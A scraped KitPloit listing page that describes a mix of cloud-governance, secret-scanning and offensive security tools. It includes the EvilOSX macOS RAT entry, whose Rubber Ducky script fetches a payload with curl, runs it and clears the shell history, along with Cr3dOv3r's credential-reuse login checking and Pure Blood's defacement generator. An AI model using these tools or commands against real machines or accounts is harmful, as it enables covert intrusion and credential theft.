Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Cloud Custodian - Rules Engine For Cloud Security, Cost Optimization, And Governance, DSL In Yaml For Policies To Query, Filter, And Take Actions On Resources

$
0
0

Cloud Custodian is a rules engine for AWS fleet management. It allows users to define policies to enable a well managed cloud infrastructure, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
Custodian can be used to manage AWS accounts by ensuring real time compliance to security policies (like encryption and access requirements), tag policies, and cost management via garbage collection of unused resources and off-hours resource management.
Custodian policies are written in simple YAML configuration files that enable users to specify policies on a resource type (EC2, ASG, Redshift, etc) and are constructed from a vocabulary of filters and actions.
It integrates with AWS Lambda and AWS Cloudwatch events to provide for real time enforcement of policies with builtin provisioning of the Lambdas, or as a simple cron job on a server to execute against large existing fleets.


Features
  • Comprehensive support for AWS services and resources (> 100), along with 400+ actions and 300+ filters to build policies with.
  • Supports arbitrary filtering on resources with nested boolean conditions.
  • Dry run any policy to see what it would do.
  • Automatically provisions AWS Lambda functions, AWS Config rules, and Cloudwatch event targets for real-time policies.
  • AWS Cloudwatch metrics outputs on resources that matched a policy
  • Structured outputs into S3 of which resources matched a policy.
  • Intelligent cache usage to minimize api calls.
  • Battle-tested - in production on some very large AWS accounts.
  • Supports cross-account usage via STS role assumption.
  • Supports integration with custom/user supplied Lambdas as actions.
  • Supports both Python 2.7 and Python 3.6 (beta) Lambda runtimes


Quick Install
$ virtualenv --python=python2 custodian
$ source custodian/bin/activate
(custodian) $ pip install c7n

Usage
First a policy file needs to be created in YAML format, as an example:
policies:
- name: remediate-extant-keys
description: |
Scan through all s3 buckets in an account and ensure all objects
are encrypted (default to AES256).
resource: s3
actions:
- encrypt-keys

- name: ec2-require-non-public-and-encrypted-volumes
resource: ec2
description: |
Provision a lambda and cloud watch event target
that looks at all new instances and terminates those with
unencrypted volumes.
mode:
type: cloudtrail
events:
- RunInstances
filters:
- type: ebs
key: Encrypted
value: false
actions:
- terminate

- name: tag-compliance
resource: ec2
description: |
Schedule a resource that does not meet tag compliance policies
to be stopped in four days.
filters:
- State.Name: running
- "tag:Environment": absent
- "tag:AppId": absent
- or:
- "tag:OwnerContact": absent
- "tag:DeptID": absent
actions:
- type: mark-for-op
op: stop
days: 4
Given that, you can run Cloud Custodian with:
# Validate the configuration (note this happens by default on run)
$ custodian validate policy.yml

# Dryrun on the policies (no actions executed) to see what resources
# match each policy.
$ custodian run --dryrun -s out policy.yml

# Run the policy
$ custodian run -s out policy.yml
Custodian supports a few other useful subcommands and options, including outputs to S3, Cloudwatch metrics, STS role assumption. Policies go together like Lego bricks with actions and filters.
Consult the documentation for additional information, or reach out on gitter.

Get Involved
Mailing List - https://groups.google.com/forum/#!forum/cloud-custodian
Gitter - https://gitter.im/capitalone/cloud-custodian

Additional Tools
The Custodian project also develops and maintains a suite of additional tools here https://github.com/capitalone/cloud-custodian/tree/master/tools:
Salactus
Scale out s3 scanning.
Mailer
A reference implementation of sending messages to users to notify them.
TrailDB
Cloudtrail indexing and timeseries generation for dashboarding
LogExporter
Cloud watch log exporting to s3
Index
Indexing of custodian metrics and outputs for dashboarding
Sentry
Log parsing for python tracebacks to integrate with https://sentry.io/welcome/



NETworkManager - A Powerful Tool For Managing Networks And Troubleshoot Network Problems

$
0
0

A powerful tool for managing networks and troubleshoot network problems!

Features
  • Network Interface - Information, Configure
  • IP-Scanner
  • Port-Scanner
  • Ping
  • Traceroute
  • DNS Lookup
  • Remote Desktop
  • PuTTY
  • SNMP - Get, Walk, Set (v1, v2c, v3)
  • Wake on LAN
  • HTTP Headers
  • Subnet Calculator - Calculator, Subnetting, Supernetting
  • Lookup - OUI, Port
  • Connections
  • Listeners
  • ARP Table

Languages
  • English
  • German
  • Russian

System requirements

Repokid - AWS Least Privilege For Distributed, High-Velocity Deployment

$
0
0

Repokid uses Access Advisor provided by Aardvark to remove permissions granting access to unused services from the inline policies of IAM roles in an AWS account.

Getting Started

Install
mkvirtualenv repokid
git clone git@github.com:Netflix/repokid.git
cd repokid
python setup.py develop
repokid config config.json

DynamoDB
You will need a DynamoDB table called repokid_roles (specify account and endpoint in dynamo_db in config file).
The table should have the following properties:
  • RoleId (string) as a primary partition key, no primary sort key
  • A global secondary index named Account with a primary partition key of Account and RoleId and Account as projected attributes
  • A global secondary index named RoleName with a primary partition key of RoleName and RoleId and RoleName as projected attributes
For development, you can run dynamo locally.
To run locally: java -Djava.library.path=./DynamoDBLocal_lib -jar DynamoDBLocal.jar -sharedDb -inMemory -port 8010
If you run the development version the table and index will be created for you automatically.

IAM Permissions:
Repokid needs an IAM Role in each account that will be queried. Additionally, Repokid needs to be launched with a role or user which can sts:AssumeRole into the different account roles.
RepokidInstanceProfile:
  • Only create one.
  • Needs the ability to call sts:AssumeRole into all of the RepokidRoles.
  • DyamoDB permissions for the repokid_roles table and all indexes (specified in assume_role subsection of dynamo_db in config) and the ability to run dynamodb:ListTables
RepokidRole:
  • Must exist in every account to be managed by repokid.
  • Must have a trust policy allowing RepokidInstanceProfile.
  • Name must be specified in connection_iam in config file.
  • Has these permissions:
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"iam:DeleteInstanceProfile",
"iam:DeleteRole",
"iam:DeleteRolePolicy",
"iam:GetInstanceProfile",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:ListInstanceProfiles",
"iam:ListInstanceProfilesForRole",
"iam:ListRolePolicies",
"iam:ListRoles",
"iam:PutRolePolicy",
"iam:UpdateRoleDescription"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
So if you are monitoring n accounts, you will always need n+1 roles. (n RepokidRoles and 1 RepokidInstanceProfile).

Editing config.json
Running repokid config config.json creates a file that you will need to edit. Find and update these fields:
  • dynamodb: If using dynamo locally, set the endpoint to http://localhost:8010. If using AWS hosted dynamo, set the region, assume_role, and account_number.
  • aardvark_api_location: The location to your Aardvark REST API. Something like https://aardvark.yourcompany.net/api/1/advisors
  • connection_iam: Set assume_role to RepokidRole, or whatever you have called it.

Optional Config
Repokid uses filters to decide which roles are candidates to be repoed. Filters may be configured to suit your environment as described below.

Blacklist Filter
Roles may be excluded by adding them to the Blacklist filter. One common reason to exclude a role is if the corresponding workload performs occasional actions that may not have been observed but are known to be required. There are two ways to exclude a role:
  • Exclude role name for all accounts: add it to a list in the config filter_config.BlacklistFilter.all
  • Exclude role name for specific account: add it to a list in the config filter_config.BlacklistFilter.<ACCOUNT_NUMBER>
Blacklists can also be maintained in an S3 blacklist file. They should be in the following form:
{
"arns": ["arn1", "arn2"],
"names": {"role_name_1": ["all", "account_number_1"], "role_name_2": ["account_number_2", "account_number_3"]}
}

Age Filter
By default the age filter excludes roles that are younger than 90 days. To change this edit the config setting: filter_config.AgeFilter.minimum_age.

Active Filters
New filters can be created to support internal logic. At Netflix we have several that are specific to our use cases. To make them active make sure they are in the Python path and add them in the config to the list in the section active_filters.

How to Use
Once Repokid is configured, use it as follows:

Standard flow
  • Update role cache: repokid update_role_cache <ACCOUNT_NUMBER>
  • Display role cache: repokid display_role_cache <ACCOUNT_NUMBER>
  • Display information about a specific role: repokid display_role <ACCOUNT_NUMBER> <ROLE_NAME>
  • Repo a specific role: repokid repo_role <ACCOUNT_NUMBER> <ROLE_NAME>
  • Repo all roles in an account: repokid repo_all_roles <ACCOUNT_NUMBER> -c

Scheduling
Rather than running a repo right now you can schedule one (schedule_repo command). The duration between scheduling and eligibility is configurable, but by default roles can be repoed 7 days after scheduling. You can then run a command repo_scheduled_roles to only repo roles which have already been scheduled.

Rolling back
Repokid stores a copy of each version of inline policies it knows about. These are added when a different version of a policy is found during update_role_cache and any time a repo action occurs. To restore a previous version run:
See all versions of roles: repokid rollback_role <ACCOUNT_NUMBER> <ROLE_NAME> Restore a specific version: repokid rollback_role <ACCOUNT_NUMBER> <ROLE_NAME> --selection=<NUMBER> -c

Stats
Repokid keeps counts of the total permissions for each role. Stats are added any time an update_role_cache or repo_role action occur. To output all stats to a CSV file run: repokid repo_stats <OUTPUT_FILENAME>. An optional account number can be specified to output stats for a specific account only.

Dispatcher
Repokid Dispatcher is designed to listen for messages on a queue and perform actions. So far the actions are:
  • List repoable services from a role
  • Set or remove an opt-out
  • List and perform rollbacks for a role
Repokid will respond on a configurable SNS topic with information about any success or failures. The Dispatcher component exists to help with operationalization of the repo lifecycle across your organization. You may choose to expose the queue directly to developers, but more likely this should be guarded because rolling back can be a destructive action if not done carefully.


Git-Secrets - Prevents You From Committing Secrets And Credentials Into Git Repositories

$
0
0

Prevents you from committing passwords and other sensitive information to a git repository.

Synopsis
git secrets --scan [-r|--recursive] [--cached] [--no-index] [--untracked] [<files>...]
git secrets --scan-history
git secrets --install [-f|--force] [<target-directory>]
git secrets --list [--global]
git secrets --add [-a|--allowed] [-l|--literal] [--global] <pattern>
git secrets --add-provider [--global] <command> [arguments...]
git secrets --register-aws [--global]
git secrets --aws-provider [<credentials-file>]


Description
git-secrets scans commits, commit messages, and --no-ff merges to prevent adding secrets into your git repositories. If a commit, commit message, or any commit in a --no-ff merge history matches one of your configured prohibited regular expression patterns, then the commit is rejected.

Installing git-secrets
git-secrets must be placed somewhere in your PATH so that it is picked up by git when running git secrets. You can use install target of the provided Makefile to install git secrets and the man page. You can customize the install path using the PREFIX and MANPREFIX variables.
make install
Or, installing with Homebrew (for OS X users).
brew install git-secrets
Warning
You're not done yet! You MUST install the git hooks for every repo that you wish to use with git secrets --install.
Here's a quick example of how to ensure a git repository is scanned for secrets on each commit:
cd /path/to/my/repo
git secrets --install
git secrets --register-aws


Options

Operation Modes
Each of these options must appear first on the command line.
--install
Installs hooks for a repository. Once the hooks are installed for a git repository, commits and non-ff merges for that repository will be prevented from committing secrets.
--scan
Scans one or more files for secrets. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched. If no files are provided, all files returned by git ls-files are scanned.
--scan-history
Scans repository including all revisions. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched.
--list
Lists the git-secrets configuration for the current repo or in the global git config.
--add
Adds a prohibited or allowed pattern.
--add-provider
Registers a secret provider. Secret providers are executables that when invoked outputs prohibited patterns that git-secrets should treat as prohibited.
--register-aws
Adds common AWS patterns to the git config and ensures that keys present in ~/.aws/credentials are not found in any commit. The following checks are added:
  • AWS Access Key ID via [A-Z0-9]{20}
  • AWS Secret Access Key assignments via ":" or "=" surrounded by optional quotes
  • AWS account ID assignments via ":" or "=" surrounded by optional quotes
  • Allowed patterns for example AWS keys (AKIAIOSFODNN7EXAMPLE and wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)
  • Enables using ~/.aws/credentials to scan for known credentials.
Note
While the patterns registered by this command should catch most instances of AWS credentials, these patterns are not guaranteed to catch them all. git-secrets should be used as an extra means of insurance -- you still need to do your due diligence to ensure that you do not commit credentials to a repository.
--aws-provider
Secret provider that outputs credentials found in an INI file. You can optionally provide the path to an ini file.

Options for --install
-f, --force
Overwrites existing hooks if present.
<target-directory>
When provided, installs git hooks to the given directory. The current directory is assumed if <target-directory> is not provided.
If the provided <target-directory> is not in a Git repository, the directory will be created and hooks will be placed in <target-directory>/hooks. This can be useful for creating Git template directories using with git init --template <target-directory>.
You can run git init on a repository that has already been initialized. >From the git init documentation:
>From the git documentation: Running git init in an existing repository is safe. It will not overwrite things that are already there. The primary reason for rerunning git init is to pick up newly added templates (or to move the repository to another place if --separate-git-dir is given).
The following git hooks are installed:
  1. pre-commit: Used to check if any of the files changed in the commit use prohibited patterns.
  2. commit-msg: Used to determine if a commit message contains a prohibited patterns.
  3. prepare-commit-msg: Used to determine if a merge commit will introduce a history that contains a prohibited pattern at any point. Please note that this hook is only invoked for non fast-forward merges.
Note
Git only allows a single script to be executed per hook. If the repository contains Debian style subdirectories like pre-commit.d and commit-msg.d, then the git hooks will be installed into these directories, which assumes that you've configured the corresponding hooks to execute all of the scripts found in these directories. If these git subdirectories are not present, then the git hooks will be installed to the git repo's .git/hooks directory.

Examples
Install git hooks to the current directory:
cd /path/to/my/repository
git secrets --install
Install git hooks to a repository other than the current directory:
git secrets --install /path/to/my/repository
Create a git template that has git-secrets installed, and then copy that template into a git repository:
git secrets --install ~/.git-templates/git-secrets
git init --template ~/.git-templates/git-secrets
Overwrite existing hooks if present:
git secrets --install -f

Options for --scan
-r, --recursive
Scans the given files recursively. If a directory is encountered, the directory will be scanned. If -r is not provided, directories will be ignored.
-r cannot be used alongside --cached, --no-index, or --untracked.
--cached
Searches blobs registered in the index file.
--no-index
Searches files in the current directory that is not managed by Git.
--untracked
In addition to searching in the tracked files in the working tree, --scan also in untracked files.
<files>...
The path to one or more files on disk to scan for secrets.
If no files are provided, all files returned by git ls-files are scanned.

Examples
Scan all files in the repo:
git secrets --scan
Scans a single file for secrets:
git secrets --scan /path/to/file
Scans a directory recursively for secrets:
git secrets --scan -r /path/to/directory
Scans multiple files for secrets:
git secrets --scan /path/to/file /path/to/other/file
You can scan by globbing:
git secrets --scan /path/to/directory/*
Scan from stdin:
echo 'hello!' | git secrets --scan -

Options for --list
--global
Lists only git-secrets configuration in the global git config.

Options for --add
--global
Adds patterns to the global git config
-l, --literal
Escapes special regular expression characters in the provided pattern so that the pattern is searched for literally.
-a, --allowed
Mark the pattern as allowed instead of prohibited. Allowed patterns are used to filter our false positives.
<pattern>
The regex pattern to search.

Examples
Adds a prohibited pattern to the current repo:
git secrets --add '[A-Z0-9]{20}'
Adds a prohibited pattern to the global git config:
git secrets --add --global '[A-Z0-9]{20}'
Adds a string that is scanned for literally (+ is escaped):
git secrets --add --literal 'foo+bar'
Add an allowed pattern:
git secrets --add -a 'allowed pattern'

Options for --register-aws
--global
Adds AWS specific configuration variables to the global git config.

Options for --aws-provider
[<credentials-file>]
If provided, specifies the custom path to an INI file to scan. If not provided, ~/.aws/credentials is assumed.

Options for --add-provider
--global
Adds the provider to the global git config.
<command>
Provider command to invoke. When invoked the command is expected to write prohibited patterns separated by new lines to stdout. Any extra arguments provided are passed on to the command.

Examples
Registers a secret provider with arguments:
git secrets --add-provider -- git secrets --aws-provider
Cats secrets out of a file:
git secrets --add-provider -- cat /path/to/secret/file/patterns


Defining prohibited patterns
egrep compatible regular expressions are used to determine if a commit or commit message contains any prohibited patterns. These regular expressions are defined using the git config command. It is important to note that different systems use different versions of egrep. For example, when running on OS X, you will use a different version of egrep than when running on something like Ubuntu (BSD vs GNU).
You can add prohibited regular expression patterns to your git config using git secrets --add <pattern>.


Ignoring false-positives
Sometimes a regular expression might match false positives. For example, git commit SHAs look a lot like AWS access keys. You can specify many different regular expression patterns as false positives using the following command:
git secrets --add --allowed 'my regex pattern'
You can also add regular expressions patterns to filter false positives to a .gitallowed file located in the repository's root directory. Lines starting with # are skipped (comment line) and empty lines are also skipped.
First, git-secrets will extract all lines from a file that contain a prohibited match. Included in the matched results will be the full path to the name of the file that was matched, followed ':', followed by the line number that was matched, followed by the entire line from the file that was matched by a secret pattern. Then, if you've defined allowed regular expressions, git-secrets will check to see if all of the matched lines match at least one of your registered allowed regular expressions. If all of the lines that were flagged as secret are canceled out by an allowed match, then the subject text does not contain any secrets. If any of the matched lines are not matched by an allowed regular expression, then git-secrets will fail the commit/merge/message.
Important
Just as it is a bad practice to add prohibited patterns that are too greedy, it is also a bad practice to add allowed patterns that are too forgiving. Be sure to test out your patterns using ad-hoc calls to git secrets --scan $filename to ensure they are working as intended.


Secret providers
Sometimes you want to check for an exact pattern match against a set of known secrets. For example, you might want to ensure that no credentials present in ~/.aws/credentials ever show up in a commit. In these cases, it's better to leave these secrets in one location rather than spread them out across git repositories in git configs. You can use "secret providers" to fetch these types of credentials. A secret provider is an executable that when invoked outputs prohibited patterns separated by new lines.
You can add secret providers using the --add-provider command:
git secrets --add-provider -- git secrets --aws-provider
Notice the use of --. This ensures that any arguments associated with the provider are passed to the provider each time it is invoked when scanning for secrets.


Example walkthrough
Let's take a look at an example. Given the following subject text (stored in /tmp/example):
This is a test!
password=ex@mplepassword
password=******
More test...
And the following registered patterns:
git secrets --add 'password\s*=\s*.+'
git secrets --add --allowed --literal 'ex@mplepassword'
Running git secrets --scan /tmp/example, the result will result in the following error output:
/tmp/example:3:password=******

[ERROR] Matched prohibited pattern

Possible mitigations:
- Mark false positives as allowed using: git config --add secrets.allowed ...
- List your configured patterns: git config --get-all secrets.patterns
- List your configured allowed patterns: git config --get-all secrets.allowed
- Use --no-verify if this is a one-time false positive
Breaking this down, the prohibited pattern value of password\s*=\s*.+ will match the following lines:
/tmp/example:2:password=ex@mplepassword
/tmp/example:3:password=******
...But the first match will be filtered out due to the fact that it matches the allowed regular expression of ex@mplepassword. Because there is still a remaining line that did not match, it is considered a secret.
Because that matching lines are placed on lines that start with the filename and line number (e.g., /tmp/example:3:...), you can create allowed patterns that take filenames and line numbers into account in the regular expression. For example, you could whitelist an entire file using something like:
git secrets --add --allowed '/tmp/example:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0
Alternatively, you could whitelist a specific line number of a file if that line is unlikely to change using something like the following:
git secrets --add --allowed '/tmp/example:3:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0
Keep this in mind when creating allowed patterns to ensure that your allowed patterns are not inadvertantly matched due to the fact that the filename is included in the subject text that allowed patterns are matched against.


Skipping validation
Use the --no-verify option in the event of a false-positive match in a commit, merge, or commit message. This will skip the execution of the git hook and allow you to make the commit or merge.



Cred Scanner - A Simple File-Based Scanner To Look For Potential AWS Access And Secret Keys In Files

$
0
0

A simple command line tool for finding AWScredentials in files. Optimized for use with Jenkins and other CI systems.
I suspect there are other, better tools out there (such as git-secrets), but I couldn't find anything to run a quick and dirty scan that also integrates well with Jenkins.

Usage:
To install just copy it where you want it and install the requirements:
pip install -r ./requirements.txt
This was written in Python 3.6.
To run:
python cred_scanner.py 
That will scan the local directory and all subdirectories. It will list the files, which ones have potential access keys, and which files can't be scanned due to the file format. cred_scanner exits with a code of 1 if it finds any potential keys.
Usage: cred_scanner.py [OPTIONS]

Options:
--path TEXT Path other than the local directory to scan
--secret Also look for Secret Key patterns. This may result in many
false matches due to the nature of secret keys.
--help Show this message and exit.
To run as a test in Jenkins just use the command line or add it as a step to your Jenkins build. Jenkins will automatically fail the build if it sees the exit code 1.


Cr3dOv3r v0.4 - Know The Dangers Of Credential Reuse Attacks

$
0
0

Your best friend in credential reuse attacks.
You give Cr3dOv3r an email then it does two simple useful jobs with it:
  • Search for public leaks for the email and returns the result with the most useful details about the leak (Using haveibeenpwned API) and tries to get the plain text passwords from leaks it find (Using @GhostProjectME).
  • Now you give it a password or a leaked password then it tries this credentials against some well-known websites (ex: facebook, twitter, google...) and tells if the login successful!

Some of the scenarios Cr3dOv3r can be used in it
  • Check if the targeted email is in any leaks and then use the leaked password to check it against the websites.
  • Check if the target credentials you found is reused on other websites/services.
  • Checking if the old password you got from the target/leaks is still used in any website.

Screenshots



Usage
usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email

positional arguments:
email Email/username to check

optional arguments:
-h, --help show this help message and exit
-p Don't check for leaks or plain text passwords.
-np Don't check for plain text passwords.
-q Quiet mode (no banner).

Installing and requirements

To make the tool work at its best you must have :
  • Python 3.x or 2.x (preferred 3).
  • Linux or Windows system.
  • Worked on some machines with MacOS and python3.
  • The requirements mentioned in the next few lines.

Installing
+For windows : (After downloading ZIP and upzip it)
cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -h
+For Linux :
git clone https://github.com/D4Vinci/Cr3dOv3r.git
cd Cr3dOv3r
python3 -m pip install -r requirements.txt
python3 Cr3dOv3r.py -h
+For docker :
git clone https://github.com/D4Vinci/Cr3dOv3r.git
docker build -t cr3dov3r Cr3dOv3r/
docker run -it cr3dov3r "example@gmail.com"
If you want to add a website to the tool, follow the instructions in the wiki

Contact

EvilOSX - An Evil RAT (Remote Administration Tool) For macOS/OS X

$
0
0

An evil RAT (Remote Administration Tool) for macOS / OS X.

Features
  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

Normal users
The server side requires python3 to run.
The bot side is written in python2 which is already installed on macOS / OS X.

Once python3 is installed, open a terminal and type the following:
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Start listening for connections
$ python3 start.py

# Lastly, run the built launcher (see the builder tab) on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users
There is also a command line interface for those who want to use this over SSH:
# Create a launcher to infect your target(s)
$ python3 builder.py

# Start listening for connections
$ python3 start.py --cli --port 1337

# Lastly, run the built launcher on your target(s)

Screenshots



Motivation
This project was created to be used with Rubber Ducky, here's the simple script:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.


Photon - Incredibly Fast Crawler Which Extracts Urls, Emails, Files, Website Accounts And Much More

$
0
0

Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

Yep, you can use 100 threads and Photon won't complain about it because its in Ninja Mode.

Why Photon?

Not Your Regular Crawler
Crawlers are supposed to recursively extract links right? Well that's kind of boring so Photon goes beyond that. It extracts the following information:
  • URLs (in-scope & out-of-scope)
  • URLs with parameters (example.com/gallery.php?id=2)
  • Intel (emails, social media accounts, amazon buckets etc.)
  • Files (pdf, png, xml etc.)
  • JavaScript files & Endpoints present in them
  • Strings based on custom regex pattern
The extracted information is saved in an organized manner.



Intelligent Multi-Threading
Here's a secret, most of the tools floating on the internet aren't properly multi-threaded even if they are supposed to. They either supply a list of items to threads which results in multiple threads accessing the same item or they simply put a thread lock and end up rendering multi-threading useless.
But Photon is different or should I say "genius"? Take a look at this and decide yourself.

Ninja Mode
In Ninja Mode, 3 online services are used to make requests to the target on your behalf.
So basically, now you have 4 clients making requests to the same server simultaneously which gives you a speed boost, minimizes the risk of connection reset as well as delays requests from a single client.
Here's a comparison generated by Quark where the lines represent threads:


Usage


-u --url
Run Photon against a single website.
python photon.py -u http://example.com

Specifying a URL with it's schema i.e. http(s):// is optional but you must add www. if the website has it.
Tip: If you feel like the crawling is taking too long or you just don't want to crawl anymore, just press ctrl + c in your terminal and Photon will skip the rest of URLs.


-l --level
Depth of crawling.
python photon.py -u http://example.com -l 3

Default Value:
2



-d --delay
You can keep a delay between requests made to the target by specifying the time in seconds.
python photon.py -u http://example.com -d 1

Default Value:
0



-t --threads
Number of threads to use.
python photon.py -u http://example.com -t 10

Default Value:
2

Tip: The optimal number of threads depends on your connection speed as well as nature of the target server. If you have a decent network connection and the server doesn't have any rate limiting in place, you can use up to 100 threads.


-c --cookie
Cookie to send.
python photon.py -u http://example.com -c "PHPSSID=821b32d21"



-n --ninja
Toggles Ninja Mode on/off.
python photon.py -u http://example.com --ninja

Default Value:
False

Tip: Ninja mode uses the following websites to make requests on your behalf:
Please help me add more "APIs" to reduce load on their servers and turn off this mode whenever not required.


--dns
Create an image displaying target domain's DNS data.
python photon.py -u http://example.com --dns

Sample Output:


Tip: It doesn't work with subdomains. This plugin is in development and this issue will be fixed in a day or two.


-s --seeds
Lets you add custom seeds, seperated by commas.
python photon.py -u http://example.com -s "http://example.com/portals.html,http://example.com/blog/2018"



-r --regex
Specify custom regex pattern to extract strings.
python photon.py -u http://example.com -r "\d{10}"

The strings extracted using the custom regex pattern are saved in custom.txt.



FF Password Exporter - Easily Export Your Passwords From Firefox

$
0
0

It can be difficult to export your passwords from Firefox. Since version 57 of Firefox (Quantum) existing password export addons no longer work. Mozilla provides no other official alternatives. FF Password Exporter makes it quick and easy to export all of your passwords from Firefox. You can use FF Password Exporter on Windows, macOS, and Linux distributions.

How to Use
  1. Download and install/run FF Password Exporter. Use the links above.
  2. Choose the Firefox user's profile directory you want to export passwords from.
  3. If you have set a master password to protect your Firefox passwords, enter it.
  4. Choose your export format: CSV or JSON.
  5. Click the export button and save the file to your device.

Supported Firefox Versions
  • Firefox 58+ with key4.db profiles

Requirements
Run the app
npm install
npm run electron


Pure Blood v2.0 - A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

$
0
0

A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter.

Web Pentest / Information Gathering:
  • Banner Grab
  • Whois
  • Traceroute
  • DNS Record
  • Reverse DNS Lookup
  • Zone Transfer Lookup
  • Port Scan
  • Admin Panel Scan
  • Subdomain Scan
  • CMS Identify
  • Reverse IP Lookup
  • Subnet Lookup
  • Extract Page Links
  • Directory Fuzz (NEW)
  • File Fuzz (NEW)
  • Shodan Search (NEW)
  • Shodan Host Lookup (NEW)

Web Application Attack: (NEW)
  • Wordpress
        | WPScan
        | WPScan Bruteforce
        | Wordpress Plugin Vulnerability Checker
            Features: // I will add more soon.
            | WordPress Woocommerce - Directory Craversal
            | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
            | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
            | WordPress Plugin Events Calendar - 'event_id' SQL Injection
  • Auto SQL Injection
        Features:
        | Union Based
        | (Error Output = False) Detection
        | Tested on 100+ Websites

Generator:
  • Deface Page
  • Password Generator // NEW
  • Text To Hash //NEW

Installation
Any Python Version.
$ git clone https://github.com/cr4shcod3/pureblood
$ cd pureblood
$ pip install -r requirements.txt

DEMO

Web Pentest
 

Web Application Attack
 

Build With

Authors


WAScan v0.2.1 - Web Application Scanner

$
0
0

WAScan ((W)eb (A)pplication (Scan)ner) is a Open Source web application security scanner. It is designed to find various vulnerabilities using "black-box" method, that means it won't study the source code of web applications but will work like a fuzzer, scanning the pages of the deployed web application, extracting links and forms and attacking the scripts, sending payloads and looking for error messages,..etc. WAScan is built on python2.7 and can run on any platform which has a Python environment.

Features
Fingerprint
  • Content Management System (CMS) -> 6
  • Web Frameworks -> 22
  • Cookies/Headers Security
  • Languages -> 9
  • Operating Systems (OS) -> 7
  • Server -> ALL
  • Web App Firewall (WAF) -> 50+
Attacks
  • Bash Commands Injection
  • Blind SQL Injection
  • Buffer Overflow
  • Carriage Return Line Feed
  • SQL Injection in Headers
  • XSS in Headers
  • HTML Injection
  • LDAP Injection
  • Local File Inclusion
  • OS Commanding
  • PHP Code Injection
  • SQL Injection
  • Server Side Injection
  • XPath Injection
  • Cross Site Scripting
  • XML External Entity
Audit
  • Apache Status Page
  • Open Redirect
  • PHPInfo
  • Robots.txt
  • XST
Bruteforce
  • Admin Panel
  • Common Backdoor
  • Common Backup Dir
  • Common Backup File
  • Common Dir
  • Common File
  • Hidden Parameters
Disclosure
  • Credit Cards
  • Emails
  • Private IP
  • Errors -> (fatal errors,...)
  • SSN

Installation
$ git clone https://github.com/m4ll0k/WAScan.git wascan
$ cd wascan
$ pip install BeautifulSoup
$ python wascan.py

Usage
Fingerprint:
$ python wascan.py --url http://xxxxx.com/ --scan 0


Attacks:
$ python wascan.py --url http://xxxxx.com/index.php?id=1 --scan 1


Audit:
$ python wascan.py --url http://xxxxx.com/ --scan 2


Bruteforce:
$ python wascan.py --url http://xxxxx.com/ --scan 3


Disclosure:
$ python wascan.py --url http://xxxxx.com/ --scan 4


Full Scan:
$ python wascan.py --url http://xxxxx.com --scan 5 


Bruteforce Hidden Parameters:
$ python wascan.py --url http://xxxxx.com/test.php --brute


Advanced Usage
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --data "id=1" --method POST
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321 --ragent -v


SafeText - Script To Remove Homoglyphs And Zero-Width Characters To Allow For Safe Distribution Of Documents From Anonymous Sources

$
0
0

Tool to sanitize text to allow for safe distribution of documents from anonymous sources by removing zero-width characters and homoglpyhs.
